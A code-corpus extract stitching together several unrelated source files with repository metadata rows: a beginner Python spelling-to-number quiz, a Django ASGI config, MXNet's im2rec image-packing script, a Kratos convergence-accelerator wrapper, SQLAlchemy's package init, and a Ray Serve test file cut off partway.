print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word cat into a numeric value"))
if answer1 == 24:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word dog into a numeric value"))
if answer2 == 26:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word hats into a numeric value"))
if answer3 == 48:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word lunch into a numeric value."))
if answer4 == 58:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word danger into a numeric value."))
if answer5 == 49:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
elif d == "Medium":
print("Welcome to Math Police Medium!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word safely into a numeric value"))
if answer1 == 68:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word privacy into a numeric value"))
if answer2 == 94:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word suburban into a numeric value"))
if answer3 == 98:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word capacity into a numeric value."))
if answer4 == 78:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word microsoft into a numeric value."))
if answer5 == 86:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word safely into a numeric value"))
if answer1 == 68:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word privacy into a numeric value"))
if answer2 == 94:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word suburban into a numeric value"))
if answer3 == 98:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word capacity into a numeric value."))
if answer4 == 78:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word microsoft into a numeric value."))
if answer5 == 86:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Hard":
score = 0
score = int(score)
print("Welcome to Math Police Hard!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word abalienate into a numeric value"))
if answer1 == 70:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word xenobiosis into a numeric value"))
if answer2 == 131:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word voicelessly into a numeric value"))
if answer3 == 146:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word xanthogenic into a numeric value."))
if answer4 == 120:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word vaccinogenic into a numeric value."))
if answer5 == 105:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2 .")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word abalienate into a numeric value"))
if answer1 == 70:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word xenobiosis into a numeric value"))
if answer2 == 131:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word voicelessly into a numeric value"))
if answer3 == 146:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word xanthogenic into a numeric value."))
if answer4 == 120:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word vaccinogenic into a numeric value."))
if answer5 == 105:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Insane":
score = 0
score = int(score)
print("Welcome to Math Police Insane!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word acetylglycine into a numeric value"))
if answer1 == 141:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word vitreodentinal into a numeric value"))
if answer2 == 168:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word vitrifications into a numeric value"))
if answer3 == 174:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 3:
print("Your score is" + " " + str(score) + " " + "out of 3.Perfect!")
elif score < 3 and score > 1:
print("Your score is" + " " + str(score) + " " + "out of 3. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 3. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
answer1 = int(input("Translate the word acetylglycine into a numeric value"))
if answer1 == 141:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word vitreodentinal into a numeric value"))
if answer2 == 168:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word vitrifications into a numeric value"))
if answer3 == 174:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "3":
print("Your score is" + " " + str(score) + " " + "out of 3.Perfect!")
elif score < 3 and score >= 1:
print("Your score is" + " " + str(score) + " " + "out of 3. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 3. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Godlike":
score = 0
score = int(score)
print("Welcome to Math Police Godlike!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word floccinaucinihilipilification into a numeric value"))
if answer1 == 280:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word pseudopseudohypoparathyroidism into a numeric value"))
if answer2 == 400:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word supercalifragilisticexpialidocious into a numeric value"))
if answer3 == 379:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word hippopotomonstrosesquippedaliophobia into a numeric value."))
if answer4 == 463:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(
input("Boss Word! Translate the word pneumonoultramicroscopicsilicovolcanoconiosis into a numeric value."))
if answer5 == 560:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word floccinaucinihilipilification into a numeric value"))
if answer1 == 280:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word pseudopseudohypoparathyroidism into a numeric value"))
if answer2 == 400:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word supercalifragilisticexpialidocious into a numeric value"))
if answer3 == 379:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word hippopotomonstrosesquippedaliophobia into a numeric value."))
if answer4 == 463:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(
input(
"Boss Word! Translate the word pneumonoultramicroscopicsilicovolcanoconiosis into a numeric value."))
if answer5 == 560:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Boss Word 1":
answer5 = int(input(
"Boss Word! Translate the word lopadotemachoselachogaleokranioleipsanodrimhypotrimmatosilphiokarabomelitokatakechymenokichlepikossyphophattoperisteralektryonoptekephalliokigklopeleiolagoiosiraiobaphetraganopterygon into a numeric value."))
if (answer5 == 2091):
print("Correct!")
else:
print("Incorrect!")
| 28.214286
| 251
| 0.506168
|
f867ff8d13c45b30e961f2e59774a57e1d7b49b9
| 439
|
py
|
Python
|
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
"""
ASGI config for django_website_database_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_website_database_project.settings')
application = get_asgi_application()
| 25.823529
| 91
| 0.808656
|
7f929138a49bc1d2f5020e107362b46d24675447
| 64
|
py
|
Python
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from pyface.ui.null.action.tool_palette import *
| 21.333333
| 48
| 0.796875
|
947f8908a77592dbea7a2a4f27e4897122948762
| 10,896
|
py
|
Python
|
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
def list_image(root, recursive, exts):
image_list = []
if recursive:
cat = {}
for path, subdirs, files in os.walk(root, followlinks=True):
subdirs.sort()
print(len(cat), path)
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (len(image_list), os.path.relpath(fpath, root), cat[path])
else:
for fname in os.listdir(root):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (len(image_list), os.path.relpath(fpath, root), 0)
def write_list(path_out, image_list):
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
def make_list(args):
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
chunk_size = (N + args.chunks - 1) / args.chunks
for i in xrange(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
def read_list(path_in):
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
yield item
def image_encode(args, item, q_out):
try:
img = cv2.imread(os.path.join(args.root, item[1]), args.color)
except:
print('imread error:', item[1])
return
if img is None:
print('read none error:', item[1])
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) / 2;
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) / 2;
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize / img.shape[1])
else:
newsize = (img.shape[1] * args.resize / img.shape[0], args.resize)
img = cv2.resize(img, newsize)
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((s, item))
except Exception, e:
print('pack_img error:', item[1], e)
return
def read_worker(args, q_in, q_out):
while True:
item = q_in.get()
if item is None:
break
image_encode(args, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname_rec = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fout = open(fname+'.tmp', 'w')
record = mx.recordio.MXRecordIO(os.path.join(working_dir, fname_rec), 'w')
while True:
deq = q_out.get()
if deq is None:
break
s, item = deq
record.write(s)
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
os.rename(fname+'.tmp', fname)
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', type=list, default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', type=bool, default=False,
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=80,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--shuffle', default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup.add_argument('--pack-label', default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
try:
import multiprocessing
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put(item)
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
except ImportError:
print('multiprocessing not available, fall back to single threaded encoding')
import Queue
q_out = Queue.Queue()
fname_rec = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
record = mx.recordio.MXRecordIO(os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for item in image_list:
image_encode(args, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write(s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
| 42.5625
| 114
| 0.558645
|
d9bc43080034344321fed96e1b4faf5ccf0d86ef
| 3,416
|
py
|
Python
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 2
|
2020-12-22T11:50:11.000Z
|
2021-09-15T11:36:30.000Z
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 1
|
2021-11-19T12:14:50.000Z
|
2021-11-19T12:14:50.000Z
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
philbucher/Kratos
|
1ceb900dbacfab344e27e32285250eafc52093ec
|
[
"BSD-4-Clause"
] | null | null | null |
# CoSimulation imports
from KratosMultiphysics.CoSimulationApplication.factories.convergence_accelerator_factory import CreateConvergenceAccelerator
# Other imports
import numpy as np
class ConvergenceAcceleratorWrapper:
"""This class wraps the convergence accelerators such that they can be used "automized"
=> this class stores the residual and updates the solutions, such that the
convergence accelerator can be configured through json
In case of distributed data, it is checked whether the convergence accelerator supports it.
If not, the data is gathered / scattered and the accelerator is executed on only one rank
"""
def __init__(self, settings, solver_wrapper):
self.interface_data = solver_wrapper.GetInterfaceData(settings["data_name"].GetString())
settings.RemoveValue("data_name")
settings.RemoveValue("solver")
self.conv_acc = CreateConvergenceAccelerator(settings)
if self.interface_data.IsDefinedOnThisRank():
conv_acc_supports_dist_data = self.conv_acc.SupportsDistributedData()
self.executing_rank = conv_acc_supports_dist_data or (self.interface_data.GetModelPart().GetCommunicator().MyPID() == 0)
self.gather_scatter_required = self.interface_data.IsDistributed() and not conv_acc_supports_dist_data
if self.gather_scatter_required:
self.data_comm = self.interface_data.GetModelPart().GetCommunicator().GetDataCommunicator()
self.sizes_from_ranks = np.cumsum(self.data_comm.GatherInts([self.interface_data.Size()], 0))
def Initialize(self):
self.conv_acc.Initialize()
def Finalize(self):
self.conv_acc.Finalize()
def InitializeSolutionStep(self):
self.conv_acc.InitializeSolutionStep()
def FinalizeSolutionStep(self):
self.conv_acc.FinalizeSolutionStep()
def InitializeNonLinearIteration(self):
if self.interface_data.IsDefinedOnThisRank():
# Saving the previous data for the computation of the residual
# and the computation of the solution update
self.input_data = self.interface_data.GetData()
self.conv_acc.InitializeNonLinearIteration()
def FinalizeNonLinearIteration(self):
self.conv_acc.FinalizeNonLinearIteration()
def ComputeAndApplyUpdate(self):
if not self.interface_data.IsDefinedOnThisRank(): return
current_data = self.interface_data.GetData()
residual = current_data - self.input_data
input_data_for_acc = self.input_data
if self.gather_scatter_required:
residual = np.array(np.concatenate(self.data_comm.GathervDoubles(residual, 0)))
input_data_for_acc = np.array(np.concatenate(self.data_comm.GathervDoubles(input_data_for_acc, 0)))
if self.executing_rank:
updated_data = input_data_for_acc + self.conv_acc.UpdateSolution(residual, input_data_for_acc)
if self.gather_scatter_required:
if self.executing_rank:
data_to_scatter = np.split(updated_data, self.sizes_from_ranks[:-1])
else:
data_to_scatter = []
updated_data = self.data_comm.ScattervDoubles(data_to_scatter, 0)
self.interface_data.SetData(updated_data)
def PrintInfo(self):
self.conv_acc.PrintInfo()
def Check(self):
self.conv_acc.Check()
| 42.17284
| 132
| 0.717799
|
8d0644c080ada7551d7bb424d2965d4759a2fc58
| 4,623
|
py
|
Python
|
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
# sqlalchemy/__init__.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import util as _util # noqa
from .inspection import inspect # noqa
from .schema import BLANK_SCHEMA # noqa
from .schema import CheckConstraint # noqa
from .schema import Column # noqa
from .schema import ColumnDefault # noqa
from .schema import Constraint # noqa
from .schema import DDL # noqa
from .schema import DefaultClause # noqa
from .schema import FetchedValue # noqa
from .schema import ForeignKey # noqa
from .schema import ForeignKeyConstraint # noqa
from .schema import Index # noqa
from .schema import MetaData # noqa
from .schema import PassiveDefault # noqa
from .schema import PrimaryKeyConstraint # noqa
from .schema import Sequence # noqa
from .schema import Table # noqa
from .schema import ThreadLocalMetaData # noqa
from .schema import UniqueConstraint # noqa
from .sql import alias # noqa
from .sql import all_ # noqa
from .sql import and_ # noqa
from .sql import any_ # noqa
from .sql import asc # noqa
from .sql import between # noqa
from .sql import bindparam # noqa
from .sql import case # noqa
from .sql import cast # noqa
from .sql import collate # noqa
from .sql import column # noqa
from .sql import delete # noqa
from .sql import desc # noqa
from .sql import distinct # noqa
from .sql import except_ # noqa
from .sql import except_all # noqa
from .sql import exists # noqa
from .sql import extract # noqa
from .sql import false # noqa
from .sql import func # noqa
from .sql import funcfilter # noqa
from .sql import insert # noqa
from .sql import intersect # noqa
from .sql import intersect_all # noqa
from .sql import join # noqa
from .sql import lateral # noqa
from .sql import literal # noqa
from .sql import literal_column # noqa
from .sql import modifier # noqa
from .sql import not_ # noqa
from .sql import null # noqa
from .sql import nullsfirst # noqa
from .sql import nullslast # noqa
from .sql import or_ # noqa
from .sql import outerjoin # noqa
from .sql import outparam # noqa
from .sql import over # noqa
from .sql import select # noqa
from .sql import subquery # noqa
from .sql import table # noqa
from .sql import tablesample # noqa
from .sql import text # noqa
from .sql import true # noqa
from .sql import tuple_ # noqa
from .sql import type_coerce # noqa
from .sql import union # noqa
from .sql import union_all # noqa
from .sql import update # noqa
from .sql import within_group # noqa
from .types import ARRAY # noqa
from .types import BIGINT # noqa
from .types import BigInteger # noqa
from .types import BINARY # noqa
from .types import Binary # noqa
from .types import BLOB # noqa
from .types import BOOLEAN # noqa
from .types import Boolean # noqa
from .types import CHAR # noqa
from .types import CLOB # noqa
from .types import DATE # noqa
from .types import Date # noqa
from .types import DATETIME # noqa
from .types import DateTime # noqa
from .types import DECIMAL # noqa
from .types import Enum # noqa
from .types import FLOAT # noqa
from .types import Float # noqa
from .types import INT # noqa
from .types import INTEGER # noqa
from .types import Integer # noqa
from .types import Interval # noqa
from .types import JSON # noqa
from .types import LargeBinary # noqa
from .types import NCHAR # noqa
from .types import NUMERIC # noqa
from .types import Numeric # noqa
from .types import NVARCHAR # noqa
from .types import PickleType # noqa
from .types import REAL # noqa
from .types import SMALLINT # noqa
from .types import SmallInteger # noqa
from .types import String # noqa
from .types import TEXT # noqa
from .types import Text # noqa
from .types import TIME # noqa
from .types import Time # noqa
from .types import TIMESTAMP # noqa
from .types import TypeDecorator # noqa
from .types import Unicode # noqa
from .types import UnicodeText # noqa
from .types import VARBINARY # noqa
from .types import VARCHAR # noqa
from .engine import create_engine # noqa nosort
from .engine import engine_from_config # noqa nosort
__version__ = "1.3.0b2"
def __go(lcls):
global __all__
from . import events # noqa
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(
name
for name, obj in lcls.items()
if not (name.startswith("_") or _inspect.ismodule(obj))
)
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| 31.664384
| 69
| 0.734372
|
423c0db0e168dafa8212b1dbabcf3bdb7576c0a8
| 7,825
|
py
|
Python
|
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
python/ray/serve/tests/test_backend_worker.py
|
AIX2/ray
|
91a1ac620012e0c779bf1bbf6983af22675cf26a
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import pytest
import numpy as np
import ray
from ray import serve
import ray.serve.context as context
from ray.serve.backend_worker import create_backend_replica, wrap_to_ray_error
from ray.serve.controller import TrafficPolicy
from ray.serve.router import Router, RequestMetadata
from ray.serve.config import BackendConfig, BackendMetadata
from ray.serve.exceptions import RayServeException
from ray.serve.utils import get_random_letters
pytestmark = pytest.mark.asyncio
def setup_worker(name,
func_or_class,
init_args=None,
backend_config=BackendConfig(),
controller_name=""):
if init_args is None:
init_args = ()
@ray.remote
class WorkerActor:
def __init__(self):
self.worker = create_backend_replica(func_or_class)(
name, name + ":tag", init_args, backend_config,
controller_name)
def ready(self):
pass
async def handle_request(self, *args, **kwargs):
return await self.worker.handle_request(*args, **kwargs)
def update_config(self, new_config):
return self.worker.update_config(new_config)
worker = WorkerActor.remote()
ray.get(worker.ready.remote())
return worker
async def add_servable_to_router(servable, router, **kwargs):
worker = setup_worker("backend", servable, **kwargs)
await router._update_worker_handles.remote({"backend": [worker]})
await router._update_traffic_policies.remote({
"endpoint": TrafficPolicy({
"backend": 1.0
})
})
if "backend_config" in kwargs:
await router._update_backend_configs.remote({
"backend": kwargs["backend_config"]
})
return worker
def make_request_param(call_method="__call__"):
return RequestMetadata(
get_random_letters(10),
"endpoint",
context.TaskContext.Python,
call_method=call_method)
@pytest.fixture
async def router(serve_instance):
q = ray.remote(Router).remote(serve_instance._controller)
yield q
ray.kill(q)
async def test_runner_wraps_error():
